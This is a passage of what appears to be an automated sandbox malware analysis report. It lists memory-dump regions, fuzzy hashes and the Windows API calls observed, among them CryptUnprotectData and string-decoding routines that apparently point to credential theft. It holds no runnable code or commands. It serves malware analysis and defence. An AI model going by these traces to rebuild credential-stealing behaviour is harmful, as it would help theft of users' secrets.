                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: !;}w$Min=$r6}V$|5*
                          • API String ID: 0-17906166
                          • Opcode ID: 36c081c81837eaf4adb91964779debd31f70e605c38083418bf14cc1d4e579d2
                          • Instruction ID: 2fbc8b033b813ac0a73d37b6454cb33f48e1c7fbaf628cb5802cdde71693664d
                          • Opcode Fuzzy Hash: 36c081c81837eaf4adb91964779debd31f70e605c38083418bf14cc1d4e579d2
                          • Instruction Fuzzy Hash: 76B217F36086049FE304AE2DDC8567ABBE6EF94320F1A893DE6C4C7744EA3558058797
                          APIs
                          • CryptBinaryToStringA.CRYPT32(00000000,00165184,40000001,00000000,00000000,?,00165184), ref: 00178EC0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptString
                          • String ID:
                          • API String ID: 80407269-0
                          • Opcode ID: 40e93ef621739de374ad56d3322bd024f1e12d51ed1db93277ac3804e279aa46
                          • Instruction ID: fc7a1a2cacbb337666f140cba2a2a3bd182579fb4228c231dd9d91d40a26ac7b
                          • Opcode Fuzzy Hash: 40e93ef621739de374ad56d3322bd024f1e12d51ed1db93277ac3804e279aa46
                          • Instruction Fuzzy Hash: F7110071244609AFDB04CFA4E888FAA37BAAF8A714F10D548F9198B250DB35E941DB60
                          APIs
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00164EEE,00000000,00000000), ref: 00169AEF
                          • LocalAlloc.KERNEL32(00000040,?,?,?,00164EEE,00000000,?), ref: 00169B01
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00164EEE,00000000,00000000), ref: 00169B2A
                          • LocalFree.KERNEL32(?,?,?,?,00164EEE,00000000,?), ref: 00169B3F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID:
                          • API String ID: 4291131564-0
                          • Opcode ID: db0209c9641044c2b9e764a0ff9d48af9b098226adf8104a25002c2567e7df28
                          • Instruction ID: cc686b35cf8dfd0e6c523ffa5683db343cb6b02d71a89e3d06f2ec5dace8afb6
                          • Opcode Fuzzy Hash: db0209c9641044c2b9e764a0ff9d48af9b098226adf8104a25002c2567e7df28
                          • Instruction Fuzzy Hash: 8311A4B4241208AFEB11CF64DC95FAA77B9FB89B10F208058F9159B394C775A901DB50
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00CCF1A0,00000000,?,00180E10,00000000,?,00000000,00000000), ref: 00177A63
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00177A6A
                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00CCF1A0,00000000,?,00180E10,00000000,?,00000000,00000000,?), ref: 00177A7D
                          • wsprintfA.USER32 ref: 00177AB7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID:
                          • API String ID: 3317088062-0
                          • Opcode ID: de6976c4a70368e3137d2e332445a5b06be39830bcf8a425bf3738c6eab87a89
                          • Instruction ID: b6a2ba8fd01db4d9512b28dc161b9628db685fa48f4ed768b5be5280cda5ad4e
                          • Opcode Fuzzy Hash: de6976c4a70368e3137d2e332445a5b06be39830bcf8a425bf3738c6eab87a89
                          • Instruction Fuzzy Hash: CE117CB1945618EBEB218B54DC49FA9BBBCFB05721F10469AE90AA32C0C7785A40CF91
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ;&n;$icuY$|E
                          • API String ID: 0-969125757
                          • Opcode ID: 4e967870f6c73012619de36909d5b835f1fb5361eabfedf3b1abe678f8e26313
                          • Instruction ID: 4482a9c4601e0ff35765f2ac9f1c1d6ed506495869bd186c375a6caa25eb150f
                          • Opcode Fuzzy Hash: 4e967870f6c73012619de36909d5b835f1fb5361eabfedf3b1abe678f8e26313
                          • Instruction Fuzzy Hash: 84A2E6F350C204AFE3046E29EC85A7AF7E9EF94720F1A493DE6C5C3744EA7558018697
                          APIs
                          • CoCreateInstance.COMBASE(0017E118,00000000,00000001,0017E108,00000000), ref: 00173758
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 001737B0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWide
                          • String ID:
                          • API String ID: 123533781-0
                          • Opcode ID: 6e12b029384ff96701367e6b825f630e28cf0ea0ea3f4a9a003baa1598a414a1
                          • Instruction ID: 66c0bc0ccde033f081e5e5f15be3226e1f0d05208f755fea4f4901c9a664548e
                          • Opcode Fuzzy Hash: 6e12b029384ff96701367e6b825f630e28cf0ea0ea3f4a9a003baa1598a414a1
                          • Instruction Fuzzy Hash: 65410A71A40A289FDB24DB58CC95B9BB7B4BB48702F4082D8E618EB2D0D7716E85CF51
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00169B84
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00169BA3
                          • LocalFree.KERNEL32(?), ref: 00169BD3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: ebd7c688424c7be8ad83ce0e46b5adfd27923ee5ba2beb4be5fa82b015dd0616
                          • Instruction ID: d8499089bea46efd5ae00634cbc8a7bda5eb7044b6bd8a2668786b2c14f4fbd6
                          • Opcode Fuzzy Hash: ebd7c688424c7be8ad83ce0e46b5adfd27923ee5ba2beb4be5fa82b015dd0616
                          • Instruction Fuzzy Hash: 3911C9B9A00209EFDB05DF94D985EAE77B9FF89300F104598E915A7350D774AE10CFA1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 7u$E__
                          • API String ID: 0-1400097245
                          • Opcode ID: 45f21e09f8b388cade121e9f3c2bdcaedd3a3205c1aef839f8643ae6857f4f0f
                          • Instruction ID: 158df46215ed76a499d57d99e871cf91038ddc3690aca661c31972a252a3f5e2
                          • Opcode Fuzzy Hash: 45f21e09f8b388cade121e9f3c2bdcaedd3a3205c1aef839f8643ae6857f4f0f
                          • Instruction Fuzzy Hash: DBB2F3F3A0C2149FE3046E2DEC8567ABBE9EF94720F16493DEAC4C7740E63558058697
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: hSs
                          • API String ID: 0-2329652023
                          • Opcode ID: 72bd31faa65dd65a9e96c6b5c49cec1db4b9ce8c1285dd79fc2137ae8b66b307
                          • Instruction ID: 8b1d5f20d31ffa512243ae330fad98d6a590f2b37385616e3f782c4e3b39c380
                          • Opcode Fuzzy Hash: 72bd31faa65dd65a9e96c6b5c49cec1db4b9ce8c1285dd79fc2137ae8b66b307
                          • Instruction Fuzzy Hash: ED51EBF390C510DBE704AE29DC056BAB7B6EB94310F2A493DD9C6C7304EA319996D783
                          Memory Dump Source
                          • Source File: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0d44e706bf4adfe1d2390d363b89246fcf98b217e92812db8c3b54fa5a6dada7
                          • Instruction ID: d7e604511c13aa8cb5ed6f2e6796657960acd338171e427f12d76152b21f58a6
                          • Opcode Fuzzy Hash: 0d44e706bf4adfe1d2390d363b89246fcf98b217e92812db8c3b54fa5a6dada7
                          • Instruction Fuzzy Hash: DB61F5B370C2009FE344AE2DEC9577ABBD6EBD8320F16463DEA84C7384E93598058756
                          Memory Dump Source
                          • Source File: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a01c8644d1e825b4cb0f01d7e3c111611c26ac17a04131a7c41e7569d8d7b5c1
                          • Instruction ID: cd13005879f295b5e106be3ec6c1194b5095c6dff8a6878c1f7f7f7fe9fadd6a
                          • Opcode Fuzzy Hash: a01c8644d1e825b4cb0f01d7e3c111611c26ac17a04131a7c41e7569d8d7b5c1
                          • Instruction Fuzzy Hash: 5861F7B3E096108FE3056E29DC8576AFBE2EFD4310F1A893CDAC897744D639584487C2
                          Memory Dump Source
                          • Source File: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 819d4d6fe693eae5333f260afb1c62f3bbb2bcdfd5016438998a881381bd571e
                          • Instruction ID: dbe7c038cd56e1d6cb8df7285f540c18c3a0f2eefbf03e4d8750f2a21647373e
                          • Opcode Fuzzy Hash: 819d4d6fe693eae5333f260afb1c62f3bbb2bcdfd5016438998a881381bd571e
                          • Instruction Fuzzy Hash: AD51F6B361C2049FE704AE6DECC562AFBE8EF54220F16492DEAC4C7744E67499418B93
                          Memory Dump Source
                          • Source File: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c3f13088c0ac8acf7ccbe7ea413d0496ee2e0e0c9e91a35a5e9777565246dfc9
                          • Instruction ID: 6dd4078acc523f2b610cedfde98742f5ab28eb517d6600a9a6b985ce884fbce7
                          • Opcode Fuzzy Hash: c3f13088c0ac8acf7ccbe7ea413d0496ee2e0e0c9e91a35a5e9777565246dfc9
                          • Instruction Fuzzy Hash: C151E5F3A086149BE3047E5DDC8577AF7EAEF98721F16463DE7C483780E97458008696
                          Memory Dump Source
                          • Source File: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
